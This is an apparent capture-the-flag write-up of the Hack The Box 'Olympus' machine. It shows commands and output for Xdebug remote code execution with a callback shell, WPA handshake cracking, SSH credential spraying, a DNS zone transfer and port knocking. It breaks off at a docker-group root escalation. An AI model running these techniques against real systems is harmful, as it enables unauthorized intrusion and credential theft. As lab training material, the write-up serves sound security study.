I"Ÿ<p><strong>Olympus</strong> is CTF-like box. Starting with exploting <strong>X-Debug</strong> plugin in Apache with just HTTP Headers which gives you a container shell. You pivot to other containers while exploring techniques like <strong>802.11 Wi-Fi cracking</strong>, <strong>DNS Zone Transfer</strong>, <strong>Port Knocking</strong> which lands you to the actual host. Then you‚Äôve to gain root with <strong>Docker</strong> privileges being given to the user.</p>

<h1 id="enumeration">Enumeration</h1>
<h2 id="masscan--nmap">Masscan + Nmap</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>masscan <span class="nt">-p1-65535</span>,U:1-65535 <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">--rate</span><span class="o">=</span>5000 <span class="nt">-e</span> tun0 | <span class="nb">tee </span>masscan.out  
Initiating SYN Stealth Scan
Scanning 1 hosts <span class="o">[</span>131070 ports/host]
Discovered open port 53/udp on 10.10.10.83
Discovered open port 53/tcp on 10.10.10.83
Discovered open port 80/tcp on 10.10.10.83
Discovered open port 2222/tcp on 10.10.10.83
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Parse those ports to nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="nv">$ ports</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat </span>masscan.out |awk <span class="s1">'{ print $4 }'</span> | <span class="nb">sed</span> <span class="s1">'s/\/tcp//;s/\/udp//'</span> | <span class="nb">tr</span> <span class="s1">'\n'</span> <span class="s1">','</span> | <span class="nb">sed</span> <span class="s1">'s/,$//'</span><span class="si">)</span>
<span class="nv">$ </span>nmap <span class="nt">-v</span> <span class="nt">-sVC</span> <span class="nt">--min-rate</span> 1000 <span class="nt">-p</span> <span class="nv">$ports</span> <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-oN</span> nmap-fullscan.out

PORT     STATE SERVICE VERSION
53/tcp   open  domain  <span class="o">(</span>unknown banner: Bind<span class="o">)</span>
| dns-nsid:
|_  bind.version: Bind
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     <span class="nb">bind</span>
|_    Bind
80/tcp   open  http    Apache httpd
|_http-favicon: Unknown favicon MD5: 399EAE2564C19BD20E855CDB3C0C9D1B
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Crete island - Olympus HTB
2222/tcp open  ssh     <span class="o">(</span>protocol 2.0<span class="o">)</span>
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-City of olympia
| ssh-hostkey:
|   2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 <span class="o">(</span>RSA<span class="o">)</span>
|_  256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 <span class="o">(</span>ED25519<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Here DNS works on both tcp and udp ports. I enumerated and got nothing.</p>
<h2 id="http-port-80">HTTP Port 80</h2>
<p>Directory fuzzing with ffuf and got nothing.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>ffuf <span class="nt">-u</span> http://10.10.10.83/FUZZ <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-fc</span> 401,403,405 <span class="nt">-e</span> .php,.html,.txt,.zip,.bak <span class="nt">-t</span> 500

        /<span class="s1">'___\  /'</span>___<span class="se">\ </span>          /<span class="s1">'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive &lt;3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.83/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php .html .txt .zip .bak
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 500
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 401,403,405
________________________________________________

index.php               [Status: 200, Size: 314, Words: 16, Lines: 12]
                        [Status: 200, Size: 314, Words: 16, Lines: 12]
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">index.php</code> shows a image. Checking the source code shows not the location for the image but a CSS file. That file contains the path for image as <code class="language-plaintext highlighter-rouge">/zeus.jpg</code>. 
I check <code class="language-plaintext highlighter-rouge">exifdata</code>, <code class="language-plaintext highlighter-rouge">strings</code> inside the image, tried extracting it with <code class="language-plaintext highlighter-rouge">steghide</code> no password, checked for any embedded files inside with <code class="language-plaintext highlighter-rouge">binwalk</code>. Got nothing.</p>

<p>Let‚Äôs check what the service is running on:</p>
<div class="language-css highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="err">$</span> <span class="nt">whatweb</span> <span class="nt">http</span><span class="o">://</span><span class="err">10</span><span class="o">.</span><span class="err">10</span><span class="o">.</span><span class="err">10</span><span class="o">.</span><span class="err">83</span>
<span class="nt">http</span><span class="o">://</span><span class="err">10</span><span class="o">.</span><span class="err">10</span><span class="o">.</span><span class="err">10</span><span class="o">.</span><span class="err">83</span> <span class="o">[</span><span class="err">200</span> <span class="nt">OK</span><span class="o">]</span> <span class="nt">Apache</span><span class="o">,</span> <span class="nt">Country</span><span class="o">[</span><span class="nt">RESERVED</span><span class="o">][</span><span class="nt">ZZ</span><span class="o">],</span> <span class="nt">HTML5</span><span class="o">,</span> <span class="nt">HTTPServer</span><span class="o">[</span><span class="nt">Apache</span><span class="o">],</span> <span class="nt">IP</span><span class="o">[</span><span class="err">10</span><span class="o">.</span><span class="err">10</span><span class="o">.</span><span class="err">10</span><span class="o">.</span><span class="err">83</span><span class="o">],</span> <span class="nt">Title</span><span class="o">[</span><span class="nt">Crete</span> <span class="nt">island</span> <span class="nt">-</span> <span class="nt">Olympus</span> <span class="nt">HTB</span><span class="o">],</span> <span class="nt">UncommonHeaders</span><span class="o">[</span><span class="nt">x-content-type-options</span><span class="o">,</span><span class="nt">xdebug</span><span class="o">],</span> <span class="nt">X-Frame-Options</span><span class="o">[</span><span class="nt">sameorigin</span><span class="o">],</span> <span class="nt">X-XSS-Protection</span><span class="o">[</span><span class="err">1</span><span class="o">;</span> <span class="nt">mode</span><span class="o">=</span><span class="nt">block</span><span class="o">]</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>It shows the server is running on <code class="language-plaintext highlighter-rouge">Apache</code>. Not just that, it shows uncommon headers: <code class="language-plaintext highlighter-rouge">x-content-type-options,xdebug</code>.</p>

<p>I can confirm those with <code class="language-plaintext highlighter-rouge">curl</code> and it shows <code class="language-plaintext highlighter-rouge">Xdebug</code> version as <code class="language-plaintext highlighter-rouge">2.5.5</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>curl <span class="nt">-I</span> http://10.10.10.83
HTTP/1.1 200 OK
Date: Thu, 05 Aug 2021 13:04:41 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1<span class="p">;</span> <span class="nv">mode</span><span class="o">=</span>block
Xdebug: 2.5.5
Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="xdebug-255">Xdebug 2.5.5</h1>
<p>XDebug plugin allows HTTP clients to debug the operation of the Traffic Server cache using the default X-Debug header.
If I google <code class="language-plaintext highlighter-rouge">xdebug exploitation</code> or <code class="language-plaintext highlighter-rouge">Xdebug 2.5.5 exploit</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>root@TheCaretaker:~<span class="nv">$ </span>googler Xdebug 2.5.5 exploit

 1.  xdebug &lt; 2.5.5 - OS Command Execution ... - Exploit-DB
     https://www.exploit-db.com/exploits/44568
     02-May-2018 ‚Äî

 2.  xdebug Unauthenticated OS Command Execution - Rapid7
     https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
     14-Jun-2018 ‚Äî

 3.  nqxcode/xdebug-exploit: OS Command Execution - GitHub
     https://github.com/nqxcode/xdebug-exploit
     23-Aug-2018 ‚Äî
</pre></td></tr></tbody></table></code></pre></div></div>

<p>It really shows some exploits existing for <code class="language-plaintext highlighter-rouge">Xdebug 2.5.5</code>. The one on exploit-db uses metasploit. 
<code class="language-plaintext highlighter-rouge">Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
    This allows the attacker to execute arbitrary php code as the context of the web user.</code></p>

<p>Let‚Äôs see just the github repos for an exploit:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre></td><td class="rouge-code"><pre>root@TheCaretaker:~/HTB/Olympus<span class="nv">$ </span>googler <span class="s1">'Xdebug 2.5.5 exploit site:github.com -htb'</span>

 1.  nqxcode/xdebug-exploit: OS Command Execution - GitHub
     https://github.com/nqxcode/xdebug-exploit
     23-Aug-2018 ‚Äî

 2.  metasploit-framework/xdebug_unauth_exec.md at master ...
     https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
     Xdebug is an actively-maintained PHP debugging tool that supports remote ... This module exploits an unauthenticated vulnerability that allows <span class="k">for </span>the¬†...

 3.  xdebug-exploit/attack-scenario.md at master ¬∑ nqxcode ...
     https://github.com/nqxcode/xdebug-exploit/blob/master/attack-scenario.md
     OS Command Execution. Contribute to nqxcode/xdebug-exploit development by creating an account on GitHub.

 4.  metasploit-framework/xdebug_unauth_exec.rb at master ...
     https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/xdebug_unauth_exec.rb
     class MetasploitModule &lt; Msf::Exploit::Remote ... Module exploits a vulnerability <span class="k">in </span>the <span class="nb">eval command </span>present <span class="k">in </span>Xdebug versions 2.5.5 and below.

 5.  gteissier/xdebug-shell: xdebug reverse shell - GitHub
     https://github.com/gteissier/xdebug-shell
     What is xdebug ? Xdebug is a php extension that allows to debug php pages, remotely by using DGBp protocol. Code repository is located at xdebug. Code execution¬†...

googler <span class="o">(</span>? <span class="k">for </span><span class="nb">help</span><span class="o">)</span> o 1-5
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The fifth link looked like a good exploit and it worked too.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>./xdebug-shell.py <span class="nt">--local-host</span><span class="o">=</span>10.10.14.32 <span class="nt">--url</span><span class="o">=</span>http://10.10.10.83/index.php
<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span>
total 116
<span class="nt">-rw-r--r--</span> 1 root root   137 Apr  7  2018 crete.css
<span class="nt">-rw-r--r--</span> 1 root root 67646 Apr  5  2018 favicon.ico
<span class="nt">-rw-r--r--</span> 1 root root   362 Apr 15  2018 index.php
<span class="nt">-rw-r--r--</span> 1 root root 37144 Apr  6  2018 zeus.jpg
</pre></td></tr></tbody></table></code></pre></div></div>

<p>This isn‚Äôt a stable shell, so I spawned a reverse-shell, which is at least better than this one.
Also I don‚Äôt find the user.txt flag and If I check IP for the box, it seems like I‚Äôm in a container.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>www-data@f00ba96171c5:/var/www/html<span class="nv">$ </span>ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:ac:14:00:02
          inet addr:172.20.0.2  Bcast:172.20.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:102 errors:0 dropped:0 overruns:0 frame:0
          TX packets:88 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:9161 <span class="o">(</span>8.9 KiB<span class="o">)</span>  TX bytes:20674 <span class="o">(</span>20.1 KiB<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>There exists one user named <code class="language-plaintext highlighter-rouge">zeus</code>, his home directory contains some files in the airgeddon directory:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>www-data@f00ba96171c5:/home/zeus/airgeddon/captured<span class="nv">$ </span><span class="nb">ls
</span>captured.cap
papyrus.txt 
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="airgeddon-dump">airgeddon dump</h1>
<p>This <code class="language-plaintext highlighter-rouge">captured.cap</code> is a tcpdump data while running airgeddon on the network.
I can crack this capture file with <code class="language-plaintext highlighter-rouge">aircrack-ng</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>aircrack-ng captured.cap <span class="nt">-w</span> /usr/share/wordlists/rockyou.txt
Reading packets, please wait...
Opening captured.cap
Read 6498 packets.

   <span class="c">#  BSSID              ESSID                     Encryption</span>

   1  F4:EC:38:AB:A8:A9  Too_cl0se_to_th3_Sun      WPA <span class="o">(</span>1 handshake<span class="o">)</span>

Choosing first network as target.

Reading packets, please wait...
Opening captured.cap
Read 6498 packets.
                               Aircrack-ng 1.6

      <span class="o">[</span>00:00:00] 59/10303723 keys tested <span class="o">(</span>1386.58 k/s<span class="o">)</span>

      Time left: 2 hours, 3 minutes, 51 seconds                  0.00%

                        KEY FOUND! <span class="o">[</span> flightoficarus <span class="o">]</span>


      Master Key     : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
                       88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38

</pre></td></tr></tbody></table></code></pre></div></div>

<p>I created a list of usernames and passwords and sprayed to ssh login using crackmapexec:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>prometheus
hades
zeus
icarus
Too_cl0se_to_th3_Sun
flightoficarus
</pre></td></tr></tbody></table></code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">icarus:Too_cl0se_to_th3_Sun</code> succeeds.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre>crackmapexec ssh 10.10.10.83 <span class="nt">--port</span> 2222 <span class="nt">-u</span> <span class="nb">users</span> <span class="nt">-p</span> <span class="nb">users
</span>SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span><span class="k">*</span><span class="o">]</span> SSH-2.0-City of olympia
SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span>-] hades:Too_cl0se_to_th3_Sun Authentication failed.
SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span>-] hades:flightoficarus Authentication failed.
SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span>-] icarus:zeus Authentication failed.
SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span>-] icarus:poseidon Authentication failed.
SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span>-] icarus:prometheus Authentication failed.
SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span>-] icarus:hades Authentication failed.
SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span>-] icarus:icarus Authentication failed.
SSH         10.10.10.83     2222   10.10.10.83      <span class="o">[</span>+] icarus:Too_cl0se_to_th3_Sun
</pre></td></tr></tbody></table></code></pre></div></div>
<p>And I can SSH in as <code class="language-plaintext highlighter-rouge">icarus</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>ssh <span class="nt">-p</span> 2222 icarus@10.10.10.83
icarus@10.10.10.83<span class="s1">'s password:
Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4
icarus@620b296204a3:~$ 
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="dns-zone-transfer">DNS Zone-Transfer</h1>
<p>But this one‚Äôs also a docker container and there‚Äôs only one file which has:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>icarus@620b296204a3:~<span class="nv">$ </span><span class="nb">cat </span>help_of_the_gods.txt
Athena goddess will guide you through the dark...
 
Way to Rhodes...
ctfolympus.htb
</pre></td></tr></tbody></table></code></pre></div></div>

<p>So, I added <code class="language-plaintext highlighter-rouge">10.10.10.83 ctfolympus.htb</code> to my /etc/hosts file and enumerated DNS again. And since DNS is running on TCP, I can try for zone-transfer:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>dig axfr ctfolympus.htb @10.10.10.83

<span class="p">;</span> &lt;&lt;<span class="o">&gt;&gt;</span> DiG 9.16.15-Debian &lt;&lt;<span class="o">&gt;&gt;</span> axfr ctfolympus.htb @10.10.10.83
<span class="p">;;</span> global options: +cmd
ctfolympus.htb.         86400   IN      SOA     ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb.         86400   IN      TXT     <span class="s2">"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"</span>
ctfolympus.htb.         86400   IN      A       192.168.0.120
ctfolympus.htb.         86400   IN      NS      ns1.ctfolympus.htb.
ctfolympus.htb.         86400   IN      NS      ns2.ctfolympus.htb.
ctfolympus.htb.         86400   IN      MX      10 mail.ctfolympus.htb.
crete.ctfolympus.htb.   86400   IN      CNAME   ctfolympus.htb.
hades.ctfolympus.htb.   86400   IN      CNAME   ctfolympus.htb.
mail.ctfolympus.htb.    86400   IN      A       192.168.0.120
ns1.ctfolympus.htb.     86400   IN      A       192.168.0.120
ns2.ctfolympus.htb.     86400   IN      A       192.168.0.120
rhodes.ctfolympus.htb.  86400   IN      CNAME   ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT     <span class="s2">"Here lies the great Colossus of Rhodes"</span>
www.ctfolympus.htb.     86400   IN      CNAME   ctfolympus.htb.
ctfolympus.htb.         86400   IN      SOA     ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
<span class="p">;;</span> Query <span class="nb">time</span>: 84 msec
<span class="p">;;</span> SERVER: 10.10.10.83#53<span class="o">(</span>10.10.10.83<span class="o">)</span>
<span class="p">;;</span> WHEN: Fri Aug 06 11:49:19 IST 2021
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Earlier I heard <em>‚ÄúWay to Rhodes‚Äù</em> and <code class="language-plaintext highlighter-rouge">dig</code> shows us <em>‚ÄúHere lies the great colossus of Rhodes‚Äù</em>. 
I tried accesing other hosts, <code class="language-plaintext highlighter-rouge">crete.ctfolympus.htb</code>, <code class="language-plaintext highlighter-rouge">hades.ctfolympus.htb</code>, <code class="language-plaintext highlighter-rouge">rhodes.ctfolympus.htb</code> and <code class="language-plaintext highlighter-rouge">RhodesColossus.ctfolympus.htb</code>.
They didn‚Äôt anything on HTTP.
But TXT record shows us <em><code class="language-plaintext highlighter-rouge">"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"</code></em></p>

<p>I tried making sense of the numbers ‚Äú3456 8234 62431‚Äù. These may be port numbers as they‚Äôre less than 65535. 
I can check if those ports are open and they aren‚Äôt:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-p</span> 3456,8234,62431 ctfolympus.htb
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-08-06 12:35 IST
Nmap scan report <span class="k">for </span>ctfolympus.htb <span class="o">(</span>10.10.10.83<span class="o">)</span>
Host is up <span class="o">(</span>0.085s latency<span class="o">)</span><span class="nb">.</span>

PORT      STATE  SERVICE
3456/tcp  closed vat
8234/tcp  closed unknown
62431/tcp closed unknown
</pre></td></tr></tbody></table></code></pre></div></div>

<p><em>‚ÄúOpen a temporal‚Äù</em> using these ports maybe hinting towards port-knocking.</p>
<h1 id="port-knocking">Port knocking</h1>
<p>I‚Äôm using a tool for port knocking which is available <a href="https://github.com/grongor/knock">here</a></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>knock ctfolympus.htb 3456 8234 62431<span class="p">;</span> nmap ctfolympus.htb
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-08-06 12:55 IST
Nmap scan report <span class="k">for </span>ctfolympus.htb <span class="o">(</span>10.10.10.83<span class="o">)</span>
Host is up <span class="o">(</span>0.095s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>1.97 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<p>And I‚Äôve a new SSH port.
I‚Äôll try <code class="language-plaintext highlighter-rouge">prometheus:St34l_th3_F1re!</code> which I got from zone-transfer.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>knock ctfolympus.htb 3456 8234 62431<span class="p">;</span> ssh prometheus@ctfolympus.htb
The authenticity of host <span class="s1">'ctfolympus.htb (10.10.10.83)'</span> can<span class="s1">'t be established.
ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span>ctfolympus.htb,10.10.10.83<span class="s1">' (ECDSA) to the list of known hosts.
prometheus@ctfolympus.htb'</span>s password:

Welcome to

    <span class="o">)</span>         <span class="o">(</span>
 <span class="o">(</span> /<span class="o">(</span>     <span class="o">)</span>   <span class="o">)</span><span class="se">\ </span><span class="o">)</span>   <span class="o">(</span>
 <span class="o">)</span><span class="se">\(</span><span class="o">))</span> <span class="o">(</span> /<span class="o">(</span>  <span class="o">(()</span>/<span class="o">(</span>  <span class="o">))</span><span class="se">\ </span><span class="o">(</span>
<span class="o">((</span>_<span class="o">)</span><span class="se">\ </span> <span class="o">)(</span>_<span class="o">))</span>  <span class="o">((</span>_<span class="o">))</span>/<span class="o">((</span>_<span class="o">))</span><span class="se">\</span>
| |<span class="o">(</span>_<span class="o">)((</span>_<span class="o">)</span>_   _| |<span class="o">(</span>_<span class="o">))</span> <span class="o">((</span>_<span class="o">)</span>
| <span class="s1">' \ / _` |/ _` |/ -_)(_-&lt;
|_||_|\__,_|\__,_|\___|/__/

prometheus@olympus:~$ ls
msg_of_gods.txt  user.txt
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>If I see the IP for the box, I can confirm this one‚Äôs the host:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="nv">$ </span>ip addr
2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    <span class="nb">link</span>/ether 00:50:56:b9:61:d5 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.83/24 brd 10.10.10.255 scope global enp0s3
       valid_lft forever preferred_lft forever
</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="privesc-via-docker">Privesc via docker</h1>
<p>If I check for groups <code class="language-plaintext highlighter-rouge">prometheus</code> is in. It lists <code class="language-plaintext highlighter-rouge">docker</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>prometheus@olympus:~<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>prometheus<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>prometheus<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>prometheus<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,25<span class="o">(</span>floppy<span class="o">)</span>,29<span class="o">(</span>audio<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,44<span class="o">(</span>video<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,108<span class="o">(</span>netdev<span class="o">)</span>,111<span class="o">(</span>bluetooth<span class="o">)</span>,999<span class="o">(</span>docker<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I can list the containers running:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>prometheus@olympus:~<span class="nv">$ </span>docker container <span class="nb">ls
</span>CONTAINER ID     IMAGE       COMMAND                  CREATED          STATUS        PORTS                       			  NAMES
f00ba96171c5     crete       <span class="s2">"docker-php-entrypoi‚Ä¶"</span>   3 years ago      Up 14 hours   0.0.0.0:80-&gt;80/tcp                       crete
ce2ecb56a96e     rodhes      <span class="s2">"/etc/bind/entrypoin‚Ä¶"</span>   3 years ago      Up 14 hours   0.0.0.0:53-&gt;53/tcp, 0.0.0.0:53-&gt;53/udp   rhodes
620b296204a3     olympia     <span class="s2">"/usr/sbin/sshd -D"</span>      3 years ago      Up 14 hours   0.0.0.0:2222-&gt;22/tcp                     olympia
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I can just run any docker while mounting the root of host to /mnt of that docker instance and access the file-system:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>prometheus@olympus:~<span class="nv">$ </span>docker run <span class="nt">-v</span> /:/mnt <span class="nt">-i</span> <span class="nt">-t</span> crete bash

